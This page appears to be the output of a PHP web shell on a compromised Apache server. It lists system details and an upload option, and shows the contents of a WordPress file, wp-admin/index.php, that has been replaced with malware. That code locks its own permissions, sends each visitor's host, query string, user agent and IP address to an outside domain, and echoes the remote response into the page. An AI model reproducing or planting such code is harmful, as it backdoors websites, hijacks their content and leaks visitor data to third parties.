HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/wp-admin/index.php
<?php
set_time_limit(0);
header("Content-Type:text/html;charset=gb2312");
date_default_timezone_set('PRC');
chmod($_SERVER['SCRIPT_FILENAME'], 0444);

$key = $_SERVER['HTTP_USER_AGENT'];
$aaaa = $_SERVER['PHP_SELF'];
$aaa = 'http://o2o.lhlsplml.com/';
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $uip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
} elseif (!empty($_SERVER['HTTP_X_REAL_IP'])) {
    $uip = $_SERVER['HTTP_X_REAL_IP'];
} else {
    $uip = $_SERVER["REMOTE_ADDR"];
}

$sc = str_replace(' ', '', $key);
$bb = @file_get_contents($aaa.'?&X&http://'.$_SERVER['HTTP_HOST'].$aaaa.'?'.$_SERVER['QUERY_STRING'].'&X&'.$sc.'&X&'.$uip);
echo $bb;
?>